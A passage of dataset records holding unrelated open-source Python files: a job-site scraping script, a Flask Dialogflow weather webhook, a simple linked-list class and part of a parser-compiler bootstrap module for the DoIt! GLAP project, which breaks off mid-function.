f'https://uk.indeed.com/jobs?q={JOBTITLE}+£{sal}&l={LOCATION}&jt={type_list[jt_fltr]}&fromage={age[age_fltr]}'\n if jt_fltr == 0: \n url = url.replace('&jt=', '')\n if age_fltr == 0: \n url = url.replace('&fromage=', '')\n if sal_fltr == 0: \n url = url.replace('+£','')\n print('fetching from site:', url)\n try:\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n open_browser(driver, url)\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"resultsCol\"))\n )\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n links = driver.find_elements_by_class_name('title')\n link_ct = 0\n for job in soup.findAll('div', 'jobsearch-SerpJobCard'):\n link_ct += 1\n if count >= N: \n break\n count += 1\n\n try:\n salary = job.find_all('span',{'class':'salaryText'})[0].text.strip()\n except:\n salary = '-NA-'\n # try:\n # driver.find_element_by\n # except:\n # intro = '-NA-'\n job_title = job.h2.a.text.strip()\n _location = job.find('span', 'location').text.strip()\n _date = job.find('span', 'date').text.strip()\n _type = type_list[jt_fltr]\n\n # click to new tab\n new_link = base_url + job.h2.a.attrs['href']\n _intro = indeed_job_description(new_link)\n\n data.append([job_title,\n salary,\n _location,\n _date,\n _type,\n _intro\n ])\n #click on job card\n # links[count].find_element_by_tag_name('a').click()\n driver.back()\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element(By.XPATH, '//*[@id=\"resultsCol\"]/nav/div/ul')\n pos = url.find('&start=')\n if pos != -1:\n url = url[:pos]\n url = url + '&start='+str((count // 10) * 10)\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'indeed')\n # driver.close()\n print('done')\n\ndef format_filename(name):\n for i in set(name):\n if not i.isalnum():\n name = name.replace(i, '_')\n return name\n\n\nif __name__ == '__main__':\n timestamp = str(datetime.datetime.now())\n filename = format_filename(timestamp) + '.xlsx'\n writer = openpyxl.Workbook()\n writer.save(filename)\n title, location, age_fltr, jt_fltr, sal_fltr, N = filters()\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument(\"--disable-notifications\")\n chrome_options.add_argument(\"--disable-popup-blocking\")\n driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n # driver = webdriver.Chrome(ChromeDriverManager().install())\n multi_site(driver, title, location, site=\"cw\")\n multi_site(driver, title, location, site=\"total\")\n multi_site(driver, title, location, site=\"jobsite\")\n multi_site(driver, title, location, site=\"city\")\n efc(driver, title, location)\n indeed(driver, title, location)\n # Thread(target = efc(\"web-dev\", \"london\")).start()\n # Thread(target = multi_site(\"web-dev\", \"london\")).start()\n driver.quit()\n","repo_name":"VishnuNarayananSR/Freelancing","sub_path":"7-Jobsite-scraping/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":14244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31377662408","text":"from flask import Flask, request, make_response\nimport json\nfrom flask_cors import CORS, cross_origin\nfrom weather import city_weather\n\napp = Flask(__name__)\n\n@app.route('/webhook', methods=['POST'])\n@cross_origin()\ndef weather():\n res = request.json\n result = res.get('queryResult')\n param = result.get('parameters')\n city = param.get('geo-city')\n w = city_weather()\n\n resp = w.weather_in(city)\n resp = json.dumps(resp)\n r = make_response(resp)\n r.headers['content-type'] = 'application/json'\n return r\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"biswajitburagohain/dialogflow_weather_chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"74453223529","text":"class Node:\r\n def __init__(self, data): # Instance attributes\r\n self.data = data # attribute called data\r\n self.next = None \r\n \r\n # Instance method ~ dunder method\r\n def __repr__(self):\r\n return self.data\r\n \r\nclass LinkedList:\r\n def __init__(self, nodes=None):\r\n self.head = None \r\n if nodes is not None:\r\n node = Node(data=nodes.pop(0))\r\n self.head = node\r\n for elem in nodes:\r\n node.next = Node(data=elem)\r\n node = node.next\r\n \r\n # Instance method ~ dunder method \r\n def __repr__(self): \r\n node = self.head\r\n nodes = []\r\n while node is not None:\r\n nodes.append(node.data)\r\n node = node.next\r\n nodes.append(\"None\")\r\n return \" -> \".join(nodes)\r\n\r\n \r\n\r\n ","repo_name":"davestroud/Algorithm_Fundamentals","sub_path":"Facebook/Linked_Lists/Linked_List.py","file_name":"Linked_List.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
+{"seq_id":"9987075613","text":"# -*- coding: utf-8 -*-\n#! \\file ./doit/text/pgen/readers/glap/bootstrap/__init__.py\n#! \\author Jiří Kučera, \n#! \\stamp 2016-12-19 02:04:45 (UTC+01:00, DST+00:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nGLAP bootstrap.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nfrom doit.support.utils import \\\n Functor\n\nfrom doit.support.cmd.runtime import \\\n Location\n\nfrom doit.support.cmd.commands import \\\n Const, \\\n MacroNode, MacroNodeSequence, MacroNodeAtom, MacroNodeParam, \\\n Expand, \\\n SetLocal, GetLocal, \\\n DefMacro, Define, DefModule, \\\n Add, Sub, Mul, Div, Mod, Neg, \\\n BitAnd, BitOr, BitXor, ShiftL, ShiftR, Inv, \\\n Lt, Gt, Le, Ge, Eq, Ne, Is, \\\n And, Or, Not, \\\n NewPair, NewList, NewHashMap, \\\n Concat, Join, Merge, \\\n Contains, \\\n GetItem, \\\n Lambda, \\\n Block, If, Foreach, While, DoWhile, Break, Continue, \\\n Call, Return, \\\n TryCatchFinally, Throw, Rethrow, \\\n SetItem, \\\n SetMember, GetMember\n\nfrom doit.text.pgen.errors import \\\n ParsingError\n\nfrom doit.text.pgen.readers.reader import \\\n Reader\n\nfrom doit.text.pgen.models.action import \\\n AddExpr as AAddExpr, SubExpr as ASubExpr, MulExpr as AMulExpr, \\\n DivExpr as ADivExpr, ModExpr as AModExpr, \\\n BitAndExpr as ABitAndExpr, BitOrExpr as ABitOrExpr, \\\n BitXorExpr as ABitXorExpr, \\\n ShiftLeftExpr as AShiftLeftExpr, ShiftRightExpr as AShiftRightExpr, \\\n NegExpr as ANegExpr, InvExpr as AInvExpr, \\\n EqExpr as AEqExpr, NotEqExpr as ANotEqExpr, LtExpr as ALtExpr, \\\n GtExpr as AGtExpr, LeExpr as ALeExpr, GeExpr as AGeExpr, \\\n LogAndExpr as ALogAndExpr, LogOrExpr as ALogOrExpr, NotExpr as ANotExpr, \\\n CallExpr as ACallExpr, \\\n IndexExpr as AIndexExpr, AccessExpr as AAccessExpr, \\\n Id as AId, IntLiteral as AIntLiteral, FloatLiteral as AFloatLiteral, \\\n StringLiteral as AStringLiteral, \\\n Block as ABlock, \\\n Assign as AAssign, InplaceAdd as AInplaceAdd, InplaceSub as AInplaceSub, \\\n InplaceMul as AInplaceMul, InplaceDiv as AInplaceDiv, \\\n InplaceMod as AInplaceMod, InplaceBitAnd as AInplaceBitAnd, \\\n InplaceBitOr as AInplaceBitOr, InplaceBitXor as AInplaceBitXor, \\\n InplaceShiftLeft as AInplaceShiftLeft, \\\n InplaceShiftRight as AInplaceShiftRight, \\\n If as AIf, Case as ACase, For as AFor, While as AWhile, \\\n DoWhile as ADoWhile, Continue as AContinue, Break as ABreak, \\\n Return as AReturn, ReturnWithValue as AReturnWithValue\n\nfrom doit.text.pgen.models.cfgram import \\\n Epsilon, Sym, Literal, Var, Range, Action, \\\n SetMinus\n\nfrom doit.text.pgen.readers.glap.bootstrap.pp.commands import \\\n DefRule, DefGrammar\n\nie_ = lambda msg: \"%s (%s; %s)\" % (\n msg,\n \"internal error\",\n \"if you see this text, the command compiler is probably buggy\"\n)\nmn_ = lambda ncls, ctx, loc, *args: (\n ncls(*args).set_location(*make_location(ctx, loc))\n)\n\ndef make_location(context, loc = -1):\n \"\"\"\n \"\"\"\n\n stream = context.stream\n if loc < 0:\n loc = stream.pos\n s = stream.data[0 : loc]\n lineno = s.count('\\n') + 1\n if lineno > 1:\n s = s.split('\\n')[-1]\n colno = len(s) + 1\n return stream.name, lineno, colno\n#-def\n\nclass SetLocation(Functor):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, file, lineno, colno):\n \"\"\"\n \"\"\"\n\n Functor.__init__(self, file, lineno, colno)\n #-def\n\n def __call__(self, node):\n \"\"\"\n \"\"\"\n\n node.set_location(*self.args)\n #-def\n#-class\n\nclass GlapLexError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n name, lineno, colno = make_location(context, loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapSyntaxError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n p = context.lexer.token.position() if context.lexer.token else -1\n name, lineno, colno = make_location(context, p if loc < 0 else loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapContext(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'stream', 'lexer', 'parser', 'actions', 'env', 'processor' ]\n\n def __init__(self):\n \"\"\"\n \"\"\"\n\n self.stream = None\n self.lexer = None\n self.parser = None\n self.actions = None\n self.env = None\n self.processor = None\n #-def\n#-class\n\nclass GlapStream(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'name', 'data', 'pos', 'size' ]\n\n def __init__(self, context, name, s):\n \"\"\"\n \"\"\"\n\n context.stream = self\n self.context = context\n self.name = name\n self.data = s\n self.pos = 0\n self.size = len(s)\n #-def\n\n def peek(self, n):\n \"\"\"\n \"\"\"\n\n return self.data[self.pos : self.pos + n]\n #-def\n\n def next(self, n = 1):\n \"\"\"\n \"\"\"\n\n self.pos += n\n #-def\n\n def match(self, p):\n \"\"\"\n \"\"\"\n\n if self.peek(len(p)) != p:\n raise GlapLexError(self.context, \"Expected %r\" % p)\n self.pos += len(p)\n return p\n #-def\n\n def matchset(self, set):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n #-def\n\n def matchif(self, f, fname):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n #-def\n\n def matchmany(self, set):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[p : self.pos]\n #-def\n\n def matchmanyif(self, f):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[p : self.pos]\n #-def\n\n def matchplus(self, set):\n \"\"\"\n \"\"\"\n\n m = self.matchset(set)\n return \"%s%s\" % (m, self.matchmany(set))\n #-def\n\n def matchplusif(self, f, fname):\n \"\"\"\n \"\"\"\n\n m = self.matchif(f, fname)\n return \"%s%s\" % (m, self.matchmanyif(f))\n #-def\n\n def matchopt(self, set, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchoptif(self, f, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchn(self, set, n):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n return self.data[p : self.pos]\n #-def\n\n def matchnif(self, f, n, fname):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n return self.data[p : self.pos]\n #-def\n#-class\n\nclass GlapCompileCmdHelper(object):\n \"\"\"\n \"\"\"\n UNSPECIFIED = -1\n NULLARY_EXPR = 0\n UNARY_EXPR = 1\n BINARY_EXPR = 2\n INDEX_EXPR = 3\n ACCESS_EXPR = 4\n ASSIGN_EXPR = 5\n NARY_EXPR = 6\n CALL_EXPR = 7\n LAMBDA_EXPR = 8\n EXPAND = 9\n VARIABLE = 10\n STATEMENT = 11\n DEFMACRO_STATEMENT = 12\n DEFINE_STATEMENT = 13\n MACRO_NODE_NULLARY = 14\n MACRO_NODE_UNARY = 15\n MACRO_NODE_BINARY = 16\n MACRO_NODE_INDEX = 17\n MACRO_NODE_ACCESS = 18\n MACRO_NODE_ASSIGN = 19\n MACRO_NODE_NARY = 20\n MACRO_NODE_CALL = 21\n MACRO_NODE_LAMBDA = 22\n MACRO_EXPAND = 23\n MACRO_VARIABLE = 24\n MACRO_PARAM = 25\n MACRO_STATEMENT = 26\n __slots__ = [\n 'kind', 'node', 'code', 'vars', 'value_holder', 'context', 'location',\n 'errmsg'\n ]\n\n def __init__(self, context, location, errmsg):\n \"\"\"\n \"\"\"\n\n self.kind = self.UNSPECIFIED\n self.node = None\n self.code = []\n self.vars = []\n self.value_holder = None\n self.context = context\n self.location = location\n self.errmsg = errmsg\n #-def\n\n def remove_duplicated_vars(self):\n \"\"\"\n \"\"\"\n\n vars = []\n for v in self.vars:\n if v not in vars:\n vars.append(v)\n self.vars = vars\n #-def\n\n def value_expr(self):\n \"\"\"\n \"\"\"\n\n if self.value_holder is None:\n raise GlapSyntaxError(self.context, self.errmsg, self.location)\n return self.value_holder\n #-def\n\n @classmethod\n def checknode(cls, context, loc, node):\n \"\"\"\n \"\"\"\n\n errmsg = \"\"\n inmacro = context.actions.inmacro\n if node.kind >= cls.MACRO_NODE_NULLARY and not inmacro:\n errmsg = \"Macro node was detected outside macro definition\"\n if node.kind < cls.MACRO_NODE_NULLARY and inmacro:\n errmsg = \"Non-macro node was detected inside macro definition\"\n if errmsg != \"\":\n raise GlapSyntaxError(context, ie_(errmsg), loc)\n #-def\n\n @classmethod\n def make_unary(cls, context, loc, expr, unop):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_UNARY\n o.node = MacroNode(unop, expr.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.UNARY_EXPR\n o.node = unop(expr.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.vars.extend(expr.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_binary(cls, context, loc, lhs, rhs, binop):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(binop, lhs.value_expr(), rhs.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = binop(lhs.value_expr(), rhs.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.vars.extend(lhs.vars)\n o.vars.extend(rhs.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_index(cls, context, loc, expr, idx):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n cls.checknode(context, loc, idx)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_INDEX\n o.node = MacroNode(GetItem, expr.value_expr(), idx.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.INDEX_EXPR\n o.node = GetItem(expr.value_expr(), idx.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.code.extend(idx.code)\n o.vars.extend(expr.vars)\n o.vars.extend(idx.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_access(cls, context, loc, module, member):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, module)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ACCESS\n o.node = MacroNode(\n GetMember, module.value_expr(), MacroNodeAtom(member.value())\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.ACCESS_EXPR\n o.node = GetMember(module.value_expr(), member.value())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(module.code)\n o.vars.extend(module.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_assign(cls, context, loc, lhs, rhs, inplaceop = None):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ASSIGN\n else:\n o.kind = cls.ASSIGN_EXPR\n if lhs.kind in (cls.VARIABLE, cls.MACRO_VARIABLE):\n if inplaceop:\n if inmacro:\n a = MacroNode(GetLocal, MacroNodeAtom(lhs.node.value()))\n a.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n ve = MacroNode(inplaceop, a, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetLocal, MacroNodeAtom(lhs.node.value()), ve\n )\n else:\n a = GetLocal(lhs.node.value())\n a.set_location(*make_location(\n context, lhs.node.position()\n ))\n ve = inplaceop(a, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetLocal(lhs.node.value(), ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetLocal,\n MacroNodeAtom(lhs.node.value()),\n rhs.value_expr()\n )\n else:\n o.node = SetLocal(lhs.node.value(), rhs.value_expr())\n elif lhs.kind in (cls.INDEX_EXPR, cls.MACRO_NODE_INDEX):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetItem, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetItem(\n lhs.node.operands[0], lhs.node.operands[1], ve\n )\n else:\n if inmacro:\n o.node = MacroNode(\n SetItem,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetItem(\n lhs.node.operands[0],\n lhs.node.operands[1],\n rhs.value_expr()\n )\n elif lhs.kind in (cls.ACCESS_EXPR, cls.MACRO_NODE_ACCESS):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetMember, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetMember(lhs.node.module, lhs.node.member, ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetMember,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetMember(\n lhs.node.module, lhs.node.member, rhs.value_expr()\n )\n else:\n raise GlapSyntaxError(context,\n \"Left-hand side of assignment must be l-value\", loc\n )\n if inmacro:\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.code.append(o.node)\n o.vars.extend(rhs.vars)\n if lhs.kind in (cls.VARIABLE, cls.MACRO_VARIABLE):\n o.vars.insert(0, lhs.node.value())\n if inmacro:\n o.value_holder = MacroNode(\n GetLocal, MacroNodeAtom(lhs.node.value())\n )\n o.value_holder.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n else:\n o.value_holder = GetLocal(lhs.node.value())\n o.value_holder.set_location(\n *make_location(context, lhs.node.position())\n )\n else:\n o.value_holder = lhs.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_call(cls, context, loc, f, fargs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, f)\n for x in fargs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_CALL\n o.node = MacroNode(\n Call, f.value_expr(), *[x.value_expr() for x in fargs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.CALL_EXPR\n o.node = Call(f.value_expr(), *[x.value_expr() for x in fargs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(f.code)\n o.vars.extend(f.vars)\n for x in fargs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_variable(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n o.node = var\n if context.actions.inmacro:\n o.kind = cls.MACRO_VARIABLE\n o.value_holder = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n o.value_holder.deferred.append(\n SetLocation(*make_location(context, var.position()))\n )\n else:\n o.kind = cls.VARIABLE\n o.value_holder = GetLocal(var.value())\n o.value_holder.set_location(\n *make_location(context, var.position())\n )\n return o\n #-def\n\n @classmethod\n def make_getvalue(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = GetLocal(var.value())\n o.node.set_location(*make_location(context, var.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_macroparam(cls, context, var):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n \"Macro parameter must be used only inside macro body\",\n var.position()\n )\n o = cls(context, var.position(), \"\")\n o.kind = cls.MACRO_PARAM\n o.node = MacroNodeParam(var.value())\n o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_expand(cls, context, loc, m, margs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, m)\n for x in margs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_EXPAND\n o.node = MacroNode(\n Expand, m.value_expr(), *[x.value_expr() for x in margs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.EXPAND\n o.node = Expand(m.value_expr(), *[x.value_expr() for x in margs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(m.code)\n o.vars.extend(m.vars)\n for x in margs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_literal(cls, context, t):\n \"\"\"\n \"\"\"\n\n o = cls(context, t.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(Const, MacroNodeAtom(t.value(True)))\n o.node.deferred.append(SetLocation(*make_location(\n context, t.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = Const(t.value(True))\n o.node.set_location(*make_location(context, t.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_pair(cls, context, loc, x, y):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, x)\n cls.checknode(context, loc, y)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(NewPair, x.value_expr(), y.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = NewPair(x.value_expr(), y.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(x.code)\n o.code.extend(y.code)\n o.vars.extend(x.vars)\n o.vars.extend(y.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_list(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for i in items:\n cls.checknode(context, loc, i)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n o.node = MacroNode(NewList, *[i.value_expr() for i in items])\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewList(*[i.value_expr() for i in items])\n o.node.set_location(*make_location(context, loc))\n for i in items:\n o.code.extend(i.code)\n o.vars.extend(i.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_hash(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for k, v in items:\n cls.checknode(context, loc, k)\n cls.checknode(context, loc, v)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n items_ = []\n for k, v in items:\n p = MacroNode(NewPair, k.value_expr(), v.value_expr())\n p.deferred.append(k.value_expr().deferred[0])\n items_.append(p)\n o.node = MacroNode(NewHashMap, *items_)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewHashMap(*[\n (k.value_expr(), v.value_expr()) for k, v in items\n ])\n o.node.set_location(*make_location(context, loc))\n for k, v in items:\n o.code.extend(k.code)\n o.code.extend(v.code)\n o.vars.extend(k.vars)\n o.vars.extend(v.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_lambda(cls, context, loc, fargs, has_varargs, commands):\n \"\"\"\n \"\"\"\n\n if context.actions.procedure_nesting_level <= 0:\n raise GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n bvars = []\n for cmd in commands:\n body.extend(cmd.code)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n bvars.extend(cmd.vars)\n fargs_ = [x.value() for x in fargs]\n bvars_ = [x for x in bvars if x not in fargs_]\n if inmacro:\n o.kind = cls.MACRO_NODE_LAMBDA\n o.node = MacroNode(\n Lambda,\n MacroNodeAtom(fargs_),\n MacroNodeAtom(has_varargs),\n MacroNodeSequence(*body),\n MacroNodeAtom(bvars_)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.LAMBDA_EXPR\n o.node = Lambda(fargs_, has_varargs, body, bvars_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_block(cls, context, loc, commands, keep_varinfo = False):\n \"\"\"\n \"\"\"\n\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n for cmd in commands:\n body.extend(cmd.code)\n if keep_varinfo:\n o.vars.extend(cmd.vars)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n if 